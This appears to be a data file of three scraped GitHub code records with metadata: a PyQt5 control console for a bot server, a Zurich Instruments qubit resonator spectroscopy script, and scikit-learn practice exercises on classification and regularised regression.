+{"seq_id": "72764017769", "text": "import io\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nimport dotenv\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom PyQt5 import QtGui, QtCore\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal, QObject\nfrom PyQt5.QtGui import QImage, QPixmap, QFontDatabase, QFont\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.uic import loadUi\n\nfrom requesters import GetRequester, PostRequester, Vars\nimport resources\n\nCHART_WIDTH = 320\n\n\nclass GetHandler(QObject):\n done = pyqtSignal(object)\n getter = GetRequester(os.environ.get('APPLICATION_URL'))\n\n def loop(self):\n while True:\n response = self.getter.response\n self.done.emit(response)\n\n time.sleep(0.3)\n\n\nclass PostHandler(QObject):\n done = pyqtSignal(object)\n poster = PostRequester(os.environ.get('APPLICATION_URL'))\n\n def post(self, instruction):\n res = self.poster.post(instruction)\n if not res.ok:\n pass\n\n self.done.emit(res.status_code)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n loadUi('main.ui', self)\n\n self._logger = logging.getLogger('index')\n self.pageList = ['homePage', 'logsPage']\n\n self.initUi()\n\n self._thread = QThread()\n\n self.get_handler = GetHandler()\n self.get_handler.done.connect(self.onRequestReady)\n\n self.post_handler = PostHandler()\n\n self.post_handler.moveToThread(self._thread)\n self.get_handler.moveToThread(self._thread)\n\n self._thread.started.connect(self.get_handler.loop)\n\n self.latency_log = [-2 for _ in range(10)]\n self.memory_usage_log = [-2 for _ in range(10)]\n\n self._thread.start()\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n self._logger.info('Closing MainWindow')\n super().closeEvent(event)\n self._logger.info('MainWindow has been successfully closed')\n\n def initUi(self):\n self._logger.info('Initializing MainWindow\\'s UI')\n\n # Navigation\n for i in ['home', 'logs']:\n eval(f'self.{i}').clicked.connect(self.onNavChecked)\n\n # Bot controls\n for i in ['launch', 'terminate', 'restart']:\n eval(f'self.{i}').clicked.connect(self.onControlBtnClick)\n\n # Window controls\n self.close_btn.clicked.connect(self.close)\n self.minimize_btn.clicked.connect(self.showMinimized)\n self.maximize_btn.clicked.connect(self.maximizeEvent)\n\n self.topBar.mouseMoveEvent = self.moveWindow\n\n # Other settings\n self.setWindowFlag(QtCore.Qt.WindowType.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WidgetAttribute.WA_TranslucentBackground)\n\n self._logger.info('Initialized UI, starting application...')\n\n def maximizeEvent(self):\n if self.isMaximized():\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: 1px transparent;\\n'\n 'border-radius: 20px;\\n'\n '}')\n self.maximize_btn.setToolTip('Maximize')\n self.showNormal()\n else:\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: none;\\n'\n '}')\n self.maximize_btn.setToolTip('Restore')\n self.showMaximized()\n\n def moveWindow(self, event):\n if event.buttons() == Qt.LeftButton:\n if self.isMaximized():\n self.maximizeEvent()\n\n self.move(self.pos() + event.globalPos() - self.dragPos)\n self.dragPos = event.globalPos()\n event.accept()\n\n def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:\n self.dragPos = event.globalPos()\n\n def onRequestReady(self, signal: dict):\n if signal is None:\n return\n\n self.updateLogs(signal)\n self.updateStatus(signal)\n self.updateVars(signal)\n\n def updateVars(self, signal: dict):\n vars_: Vars = signal['vars']\n data = json.loads(vars_.json())\n cpu, servers, memory = data.values()\n memory = float(memory[:-1])\n\n self.servers.setText(f'Servers: {servers}')\n self.title_mem.setText(f'Memory: {memory:.2f} MB')\n self.title_lat.setText(f'CPU: {cpu:.2f}%')\n\n del self.memory_usage_log[0]\n self.memory_usage_log.append(round(memory, 2))\n\n del self.latency_log[0]\n self.latency_log.append(round(cpu, 2))\n\n # Memory usage chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.memory_usage_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 512])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.memory.setPixmap(pixmap)\n\n # Latency changes chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.latency_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 0.5])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.latency.setPixmap(pixmap)\n\n @staticmethod\n def convertImage(im):\n im2 = im.convert('RGBA')\n data = im2.tobytes('raw', 'RGBA')\n qim = QImage(data, im.size[0], im.size[1], QImage.Format_ARGB32)\n pixmap = QPixmap.fromImage(qim)\n return pixmap\n\n def updateLogs(self, signal: dict):\n self.logger.setPlainText(signal['log'].content)\n self.logger.moveCursor(QtGui.QTextCursor.End)\n\n def updateStatus(self, signal: dict):\n self.status.setText(\n f'Bot status:\\n{signal[\"status\"]}'\n )\n\n def onControlBtnClick(self):\n instruction = self.sender().objectName()\n self.post_handler.post(instruction)\n\n def onNavChecked(self):\n page = self.sender().objectName() + 'Page'\n self.pages.setCurrentIndex(self.pageList.index(page))\n\n\ndef hook(*args):\n sys.__excepthook__(*args)\n\n\nif __name__ == '__main__':\n dotenv.load_dotenv('./.env')\n pyqt_plugins = 'venv/Lib/site-packages/PyQt5/Qt5/plugins/platforms'\n os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = pyqt_plugins\n\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(name)s:\\t%(message)s',\n datefmt='%y.%b.%Y %H:%M:%S')\n\n app = QApplication([])\n QFontDatabase.addApplicationFont('sources/fonts/Montserrat-Regular.ttf')\n window = MainWindow()\n sys.__excepthook__ = hook\n\n window.show()\n app.exec()\n\n del window, app\n", "repo_name": "l4blee/nosok-bot_console", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 7257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtCore.QObject", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 24, "usage_type": "call"}, {"api_name": "requesters.GetRequester", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QObject", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 36, "usage_type": "call"}, {"api_name": "requesters.PostRequester", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QCloseEvent", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 74, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 99, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.LeftButton", "line_number": 123, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 123, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 131, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 131, "usage_type": "name"}, {"api_name": "requesters.Vars", "line_number": 143, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 177, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 189, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 189, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_ARGB32", "line_number": 198, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 199, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 199, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QTextCursor", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 204, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 221, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 225, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 227, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 229, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 229, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 233, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase.addApplicationFont", "line_number": 234, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase", "line_number": 234, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 236, "usage_type": "attribute"}]}
+{"seq_id": "27115300850", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 27 15:37:41 2022\n\n@author: zhinst\n\nRequirements:\n\n LabOne Version >= 22.02\n Instruments: 1 x SHFQC Instrument\n\n\"\"\"\n# In[1]\n\nfrom zhinst.toolkit import Session, SHFQAChannelMode\n\nsession = Session(\"localhost\")\ndevice = session.connect_device(\"DEV12131\")\n\n# In[2] Parameter\n\nnumber_of_qubits = 1\n\nqachannel_center_frequency = 6.4e9\nqachannel_power_in = -50\nqachannel_power_out = -30\n\nmax_amplitude_readout = 1 / number_of_qubits # * 0.98\n\n# Sweep Parameter\nqubit_readout_frequencies = [-1e6]\nqubit_readout_widths = [4e6]\nnumber_amplitude_values = 20\naverage_factor = 1e-6 # if set to 1, scales averages with amplitude\n\n# In[3] Device configuration\n\ndevice.qachannels[0].configure_channel(\n center_frequency=qachannel_center_frequency,\n input_range=qachannel_power_in,\n output_range=qachannel_power_out,\n mode=SHFQAChannelMode.SPECTROSCOPY,\n)\n\n# In[4] Sweeper configuration\n\n# initiates sweeper parameters\nsweeper = session.modules.shfqa_sweeper\nsweeper.device(device)\n\nsweeper.rf.center_freq(qachannel_center_frequency)\nsweeper.rf.input_range(qachannel_power_in)\nsweeper.rf.output_range(qachannel_power_out)\n\n# sweeper.sweep.start_freq(-700e6)\n# sweeper.sweep.stop_freq(700e6)\nsweeper.sweep.num_points(3001)\nsweeper.sweep.mapping(\"linear\")\nsweeper.sweep.oscillator_gain(max_amplitude_readout)\nsweeper.sweep.mode(True)\n\nsweeper.average.integration_time(1000e-6)\nsweeper.average.num_averages(1)\nsweeper.average.mode(\"cyclic\")\n\n# In[5] Measure each resonator with different powers\n\nimport sys\nimport os\nimport numpy as np\n\nresonator_spectrum_data = {\"qubits\": [[]] * number_of_qubits}\nrelative_amplitude_values = np.linspace(\n max_amplitude_readout / number_amplitude_values,\n max_amplitude_readout,\n number_amplitude_values,\n)\n\ndevice.qachannels[0].input.on(1)\ndevice.qachannels[0].output.on(1)\n\nprint(f\"sweep {number_of_qubits} qubits at {number_amplitude_values} amplitudes\")\n\nfor qubit in range(number_of_qubits):\n sweeper.sweep.start_freq(\n qubit_readout_frequencies[qubit] - qubit_readout_widths[qubit]\n )\n sweeper.sweep.stop_freq(\n qubit_readout_frequencies[qubit] + qubit_readout_widths[qubit]\n )\n\n for i, amplitude in enumerate(relative_amplitude_values):\n sweeper.sweep.oscillator_gain(amplitude)\n sweeper.average.num_averages(int(np.ceil(average_factor * 1 / amplitude ** 2)))\n print(\n f\"qubit: {qubit+1} amp: {amplitude:.5f} ({i+1}/{number_amplitude_values})\",\n end=\"\\r\",\n )\n old_stdout = sys.stdout # backup current stdout\n sys.stdout = open(os.devnull, \"w\")\n resonator_spectrum_data[\"qubits\"][qubit].append(sweeper.run())\n sys.stdout = old_stdout # reset old stdout\n\ndevice.qachannels[0].input.on(0)\ndevice.qachannels[0].output.on(0)\n\n# In[6] Plot the data for each qubit\n\n#resonator_spectrum_data['qubits'][0]==resonator_spectrum_data['qubits'][1]\n\nimport matplotlib.pyplot as plt\nfrom shfqc_helper import voltage_to_power_dBm\n\nfont_large=15\nfont_medium=10\n\nnum_points = sweeper.sweep.num_points()\n\nfor qubit in range(number_of_qubits):\n number_amplitude_values = np.size(relative_amplitude_values)\n x_data = np.zeros((number_amplitude_values, num_points))\n y_data = np.zeros((number_amplitude_values, num_points))\n z_data = np.zeros((number_amplitude_values, num_points), dtype=complex)\n slope_array = np.zeros((number_amplitude_values, num_points))\n\n for amp_ind, amplitude in enumerate(relative_amplitude_values):\n spec_path = resonator_spectrum_data[\"qubits\"][qubit][qubit*number_of_qubits+amp_ind]\n spec_path_props = spec_path[\"properties\"]\n\n z_data[amp_ind] = spec_path[\"vector\"]\n\n \n fig = plt.figure()\n fig.suptitle(f\"Qubit {qubit+1}, amplitude [dBm]\", fontsize=font_large)\n plt_extent = [qachannel_center_frequency+spec_path_props[\"startfreq\"],\n qachannel_center_frequency+spec_path_props[\"stopfreq\"],\n np.max(relative_amplitude_values), np.min(relative_amplitude_values)]\n \n plt.imshow(voltage_to_power_dBm(abs(z_data)), aspect = 'auto', extent = plt_extent)\n \n plt.ylabel('Readout amplitude (a.u.)')\n plt.xlabel('Frequency (Hz)')\n plt.colorbar()\n\n plt.show()\n", "repo_name": "asqum/PYQUM", "sub_path": "TEST/BETAsite/RS/ZI_SHFQC/shfqc_resonator_spectroscopy_cw_power.py", "file_name": "shfqc_resonator_spectroscopy_cw_power.py", "file_ext": "py", "file_size_in_byte": 4272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "zhinst.toolkit.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode.SPECTROSCOPY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.devnull", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.size", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "shfqc_helper.voltage_to_power_dBm", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}]}
+{"seq_id": "72524121447", "text": "###Classifiers\n###EDA functions\n#import seaborn as sns\n#sns.heatmap(df.corr(), square=True, cmap='RdYlGn')\n###KNN\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\ndigits = datasets.load_digits()\n#print(digits.DESCR)\n#print(digits.keys())\n#print(digits.images.shape)\n#print(digits.data.shape)\n#plt.imshow(digits.images[1010], cmap=plt.cm.gray_r, interpolation='nearest')\n#plt.show()\n\nX = digits.data\ny = digits.target\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=42, stratify=digits.target)\n\nneighbors = np.arange(1, 9)\ntrain_accuracy = np.empty(len(neighbors))\ntest_accuracy = np.empty(len(neighbors))\n\nfor i, k in enumerate(neighbors):\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train,y_train)\n train_accuracy[i] = knn.score(X_train, y_train)\n test_accuracy[i] = knn.score(X_test, y_test)\n \n# Generate plot\nplt.title('k-NN: Varying Number of Neighbors')\nplt.plot(neighbors, test_accuracy, label = 'Testing Accuracy')\nplt.plot(neighbors, train_accuracy, label = 'Training Accuracy')\nplt.legend()\nplt.xlabel('Number of Neighbors')\nplt.ylabel('Accuracy')\nplt.show()\n#Hyparparameters search###\nfrom sklearn.model_selection import GridSearchCV\n\n# Setup the hyperparameter grid\nknn = KNeighborsClassifier()\nparam_grid = {'n_neighbors': np.arange(1,50)}\nknn_cv = GridSearchCV(knn, param_grid, cv=5)\nknn_cv.fit(X_train, y_train)\nprint(\"Tuned knn: {}\".format(knn_cv.best_params_))\nprint(\"Best score is {}\".format(knn_cv.best_score_))\n\n#Metrics of the Classifier###\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ny_pred = knn.predict(X_test)\n\n# Generate the confusion matrix and classification report\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n\n###Regressions\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.read_csv('gapminder.csv')\n\ny = df['life'].values\nX = df['fertility'].values\n\ny = y.reshape(-1, 1)\nX = X.reshape(-1, 1)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state=42)\n\nreg = LinearRegression()\nprediction_space = np.linspace(min(X), max(X)).reshape(-1,1)\n\nreg.fit(X_train, y_train)\ny_pred = reg.predict(prediction_space)\nprint(reg.score(X, y))\nplt.plot(prediction_space, y_pred, color='black', linewidth=3)\nplt.show()\n\ny_pred = reg.predict(X_test)\n\n# Compute and print R^2 and RMSE\nprint(\"R^2: {}\".format(all.score(X_test, y_test)))\nrmse = np.sqrt(mean_squared_error(y_test, y_pred))\nprint(\"Root Mean Squared Error: {}\".format(rmse))\n\n###K-fold cross validation\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import cross_val_score\nreg = LinearRegression()\ncv_scores = cross_val_score(reg,X,y,cv=5)\n\nprint(cv_scores)\nprint(\"Average 5-Fold CV Score: {}\".format(np.mean(cv_scores)))\n\n###Reguralization\n#Lasso\nfrom sklearn.linear_model import Lasso\nlasso = Lasso(alpha=0.4,normalize=True)\nlasso.fit(X , y)\nlasso_coef =lasso.coef_ \nprint(lasso_coef)\n\n# Plot the coefficients\nplt.plot(range(len(datasets.columns)), lasso_coef)\nplt.xticks(range(len(datasets.columns)), datasets.columns.values, rotation=60)\nplt.margins(0.02)\nplt.show()\n\n#Regularization II: Ridge\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import cross_val_score\n\nalpha_space = np.logspace(-4, 0, 50)\nridge_scores = []\nridge_scores_std = []\nridge = Ridge(normalize=True)\n\nfor alpha in alpha_space:\n ridge.alpha = alpha\n ridge_cv_scores = cross_val_score(ridge, X, y, cv=10)\n ridge_scores.append(np.mean(ridge_cv_scores))\n ridge_scores_std.append(np.std(ridge_cv_scores))\n\n#display_plot(ridge_scores, ridge_scores_std)\n####Regularization ELASTIC NET a∗L1+b∗L2\n # Import necessary modules\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\n\n# Create train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, random_state=42)\n\n# Create the hyperparameter grid\nl1_space = np.linspace(0, 1, 30)\nparam_grid = {'l1_ratio': l1_space}\n\nelastic_net = ElasticNet()\n\n# Setup the GridSearchCV object: gm_cv\ngm_cv = GridSearchCV(elastic_net, param_grid, cv=5)\ngm_cv.fit(X_train, y_train)\ny_pred = gm_cv.predict(X_test)\nr2 = gm_cv.score(X_test, y_test)\nmse = mean_squared_error(y_test, y_pred)\nprint(\"Tuned ElasticNet l1 ratio: {}\".format(gm_cv.best_params_))\nprint(\"Tuned ElasticNet R squared: {}\".format(r2))\nprint(\"Tuned ElasticNet MSE: {}\".format(mse))\n", "repo_name": "AntonYurievNikolov/PythonTests", "sub_path": "Data Camp ML courses/Supervised and Pipes/Supervised with scikit-learn .py", "file_name": "Supervised with scikit-learn .py", "file_ext": "py", "file_size_in_byte": 4849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_digits", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 94, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Lasso", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "sklearn.datasets.columns", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sklearn.datasets", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.logspace", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.linear_model.ElasticNet", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 157, "usage_type": "call"}]}
